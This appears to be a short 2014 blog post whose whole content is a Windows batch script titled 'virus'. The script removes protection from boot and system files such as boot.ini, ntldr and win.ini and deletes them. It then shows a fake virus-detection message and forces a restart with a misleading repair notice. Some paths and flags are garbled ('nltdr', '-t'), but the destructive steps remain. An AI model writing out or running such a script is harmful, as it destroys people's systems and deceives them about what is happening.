Sunday, June 8, 2014

@echo off
cls
color 0c
title virus
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\ntldr
del c:\nltdr
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
attrib -r -t -h c:\filesystem\pagefile.exe
del c:\filesystem\pagefile.exe
@echo off
cls
msg * windows detected a virus !
shutdown -r -t 15 -c "windows need to shutdown and repair"

No comments:

Post a Comment